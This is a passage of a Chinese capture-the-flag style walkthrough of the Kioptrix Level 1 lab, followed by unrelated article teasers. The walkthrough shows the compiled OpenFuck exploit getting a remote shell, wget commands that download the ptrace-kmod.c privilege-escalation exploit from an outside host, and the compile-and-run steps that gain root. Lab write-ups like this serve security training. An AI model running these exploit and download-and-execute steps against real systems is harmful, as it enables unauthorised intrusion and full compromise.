47080.c:798:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  798 |                 MD5_Final(km,&ctx);
      |                 ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
   51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
      |                           ^~~~~~~~~
47080.c: In function ‘generate_session_keys’:
47080.c:807:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  807 |         RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
      |         ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
   35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
      |                            ^~~~~~~~~~~
47080.c:811:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  811 |         RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
      |         ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
   35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
      |                            ^~~~~~~~~~~
┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# ls 
47080.c  OpenFuck

脚本编译成功

3.5 执行脚本

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# ./OpenFuck 0x6b 192.168.6.164 443 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--08:20:03--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ 
bash-2.05$ 
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ whoami
whoami
apache

执行脚本成功。由于编译文件的缺失,导致部分文件未执行成功,所以并没有获得root权限。

3.6 补充

3.6.1 下载ptrace-kmod.c

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
--2024-06-08 08:28:04--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
Resolving dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200
Connecting to dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3921 (3.8K) [text/x-csrc]
Saving to: ‘ptrace-kmod.c’

ptrace-kmod.c                                       100%[===================================================================================================================>]   3.83K  --.-KB/s    in 0.02s   

2024-06-08 08:28:05 (248 KB/s) - ‘ptrace-kmod.c’ saved [3921/3921]

                                                                                                                                                                                                                
┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# ls
47080.c  OpenFuck  ptrace-kmod.c

3.6.2 kali开启http服务

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# python -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

3.6.3 靶机下载ptrace-kmod.c

bash-2.05$ wget 192.168.6.66/ptrace-kmod.c
wget 192.168.6.66/ptrace-kmod.c
--08:37:34--  http://192.168.6.66/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to 192.168.6.66:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

08:37:34 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

3.6.4 再次执行脚本

┌──(root㉿kali)-[/home/kali/Kioptix_Level#1]
└─# ./OpenFuck 0x6b 192.168.6.164 443 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--08:39:14--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c.1'
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: file path prefix `/usr/bin' never used
[+] Attached to 7417
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

成功获得root权限


渗透总结

在Kioptrix Level #1靶场渗透测试中,使用nmap进行主机发现和端口扫描测试,进行扫描目录,使用whatweb信息网页信息搜集取到了关键信息,漏洞搜索,下载paylod编译执行payload文件获得root权限,思路如下:

  • 主机发现
  • 端口扫描
  • 目录扫描
  • 漏洞发现
  • payload利用
  • linux内核提权

参考文章

  • Kioptrix Level #1
  • arp-scan使用
  • nmap详细使用教程
  • 黑客工具之whatweb详细使用教程
  • Kioptrix Level #1

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/692017.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

AI图书推荐:这就是ChatGPT

这本书《这就是ChatGPT》&#xff08;What Is ChatGPT Doing ... and Why Does It Work &#xff09;由Stephen Wolfram撰写 全书内容概要如下&#xff1a; **引言与预备知识** - 作者首先表达了对ChatGPT技术突破的兴奋之情&#xff0c;指出这不仅是技术的故事&#xff0c;也是…

第六篇红队笔记-百靶精讲之pWnOS2.0

ip修改 主机发现 nmap端口扫描 Web渗透 文件上传漏洞利用 获得初级系统shell 敏感文件获取 MySQL数据获取 Root和总结 直接尝试mysql账号

深度图的方法实现加雾,Synscapes数据集以及D455相机拍摄为例

前言 在次之前&#xff0c;我们已经做了图像加雾的一些研究&#xff0c;这里我们将从深度图的方法实现加雾展开细讲 图像加雾算法的研究与应用_图像加雾 算法-CSDN博客 接下来将要介绍如何使用深度图像生成雾效图像的方法。利用Synscapes数据集&#xff0c;通过读取EXR格式的…

数据库(28)——联合查询

对于union查询&#xff0c;就是把多次查询的结果合并起来&#xff0c;形成一个新的查询结果集。 语法 SELECT 字段列表 FROM 表A... UNION [ALL] SELECT 字段列表 FROM 表B...; 演示 select * from user where age > 22 union all select * from user where age < 50; u…

Android 11 低电量自动关机失效

Android 11 低电量自动关机 概述 安卓系统设计了低电关机功能&#xff0c;旨在当手机电池电量过低时自动关机&#xff0c;以保护手机硬件和数据安全。该功能由以下几个部分组成&#xff1a; 电池电量监测: 安卓系统通过 BatteryService 组件持续监测电池电量。BatteryService…

关于修改Python中pip默认安装路径的终极方法

别想了&#xff0c;终极方法就是手动复制&#xff0c;不过我可以给你参考一下手动复制的方法 关于手动移动pip安装包的方法 别想了&#xff0c;终极方法就是手动复制&#xff0c;不过我可以给你参考一下手动复制的方法一、首先确认一下pip默认安装路径二、再确认一下需要移动到…

王道408数据结构CH3_栈、队列

概述 3.栈、队列和数组 3.1 栈 3.1.1 基本操作 3.1.2 顺序栈 #define Maxsize 50typedef struct{ElemType data[Maxsize];int top; }SqStack;3.1.3 链式栈 typedef struct LinkNode{ElemType data;struct LinkNode *next; }*LiStack;3.2 队列 3.2.1 基本操作 3.2.2 顺序存储…

java异常处理知识点总结

一.前提知识 首先当运行出错的时候&#xff0c;有两种情况&#xff0c;一种叫做“错误”&#xff0c;另一种叫做“异常”。错误指的是运行过程中遇到了硬件或操作系统出错&#xff0c;这种情况程序员是没办法处理的&#xff0c;因为这是硬件和系统的问题&#xff0c;不能靠代码…

linux中dd命令以及如何测试读写速度

dd命令详解 dd命令是一个在Unix和类Unix系统中非常常用的命令行工具&#xff0c;它主要用于复制文件和转换文件数据。下面我会详细介绍一些dd命令的常见用法和功能&#xff1a; 基本语法 dd命令的基本语法如下&#xff1a; bash Copy Code dd [option]...主要选项和参数 if…

Meta Llama 3 RMSNorm(Root Mean Square Layer Normalization)

Meta Llama 3 RMSNorm&#xff08;Root Mean Square Layer Normalization&#xff09; flyfish 目录 Meta Llama 3 RMSNorm&#xff08;Root Mean Square Layer Normalization&#xff09;先看LayerNorm和BatchNorm举个例子计算 LayerNormRMSNorm 的整个计算过程实际代码实现结…

OpenAI发表研究论文 介绍了一种逆向工程AI模型工作原理的方法

ChatGPT 开发商 OpenAI 构建人工智能的方法本周遭到了前员工的抨击&#xff0c;他们指责该公司利用可能有害的技术冒不必要的风险。今天&#xff0c;OpenAI 发布了一篇新的研究论文&#xff0c;目的显然是为了表明它在通过提高模型的可解释性来应对人工智能风险方面的认真态度。…

跨区域文件管控过程中 如何保障安全和效率?

跨区域文件管控是指在跨越不同地域或区域的情况下对文件进行管理和控制的过程。这种控制可能涉及多个方面&#xff0c;包括安全性、合规性和管理效率等。 为了有效进行跨区域文件管控&#xff0c;组织通常需要采取一系列策略和措施&#xff0c;例如&#xff1a; 1、加密和安全…

西门子学习笔记10 - MCGS和西门子1200进行通讯设置

1、博图软件的设置 1、修改PLC的ip地址为192.168.1.1 2、打开put&#xff0c;get通讯功能 3、设置通讯变量&#xff0c;可以是M区也可以是DB块的数据 2、MCGSE组态环境设置 1、新建项目&#xff0c;在设备窗口界面进入设备窗口 2、添加设备如下 3、双击进入配置界面 4、添加变…

把 FolkMQ 内嵌到 SpringBoot2 项目里(比如 “诺依” 啊)

FolkMQ &#xff08;消息中间件&#xff09;支持内嵌、单机、集群、多重集群等多种部署方式。 内嵌版&#xff0c;就相当于 H2 或 SQLite 数据库一样。给一些小项目&#xff08;或者特别需求&#xff09;带来了方便。大项目&#xff0c;则可以使用独立部署的 “单机版” 或 “…

原花青素优化定向壳聚糖微通道的简单免疫调控结构设计

引用信息 文 章&#xff1a;A facile Immunoregulatory Constructional Design by Proanthocyanidin Optimizing Directional Chitosan Microchannel 期 刊&#xff1a;Small&#xff08;影响因子&#xff1a;13.3&#xff09; 发表时间&#xff1a;29/02/2024 作 …

软件游戏找不到d3dx9_43.dll怎么办,三分钟教你解决此问题

在现代科技发展的时代&#xff0c;电脑已经成为我们生活中不可或缺的一部分。然而&#xff0c;在使用电脑的过程中&#xff0c;我们可能会遇到一些问题&#xff0c;其中之一就是电脑缺失d3dx943.dll文件。这个问题可能会影响到我们的正常使用&#xff0c;因此了解其原因和解决方…

AI Agentic Design Patterns with AutoGen(下):工具使用、代码编写、多代理群聊

文章目录 四、工具使用: 国际象棋游戏4.1 准备工具4.2 创建两个棋手代理和棋盘代理4.3 注册工具到代理4.4 创建对话流程&#xff0c;开始对话4.5 增加趣味性&#xff1a;加入闲聊 五、代码编写&#xff1a;财务分析5.1导入和配置代码执行器5.2 创建 代码执行/编写 代理5.3 定义…

IO进程线程(七)代码替换函数、守护进程

文章目录 一、代码替换函数&#xff08;一&#xff09;system函数&#xff08;二&#xff09;exec函数族 二、守护进程&#xff08;一&#xff09;创建1. 脱离父进程影响2. 脱离原会话组和进程组的影响3.修改进程工作目录4. 修改进程创建文件的掩码5. 关闭从父进程继承的文件描…

YB2416 SOP8封装30V耐压 低成本3A电流同步降压车充芯片

YB2416 SOP-8 SOP8封装30V耐压 输出电流3A 输出电压可调 输出限流调节 外部线补功能车充IC 过流打隔保护 YB2416A50 SOP-8 30V 3A 固定5V 输出 5%高恒流精度 欠压过流过温保护 YB2416是支持高电压输入的同步降压电源管理芯片&#xff0c;在 4~30V 的宽输入电压范围内可实现3A的…

http和https数据传输与协议区分

目录 1. 数据传输安全性2. 端口号3. URL 前缀4. SSL/TLS 证书5. 性能6. SEO 和用户信任7. 应用场景总结 HTTP&#xff08;HyperText Transfer Protocol&#xff09;和 HTTPS&#xff08;HyperText Transfer Protocol Secure&#xff09;是用于在客户端&#xff08;如浏览器&…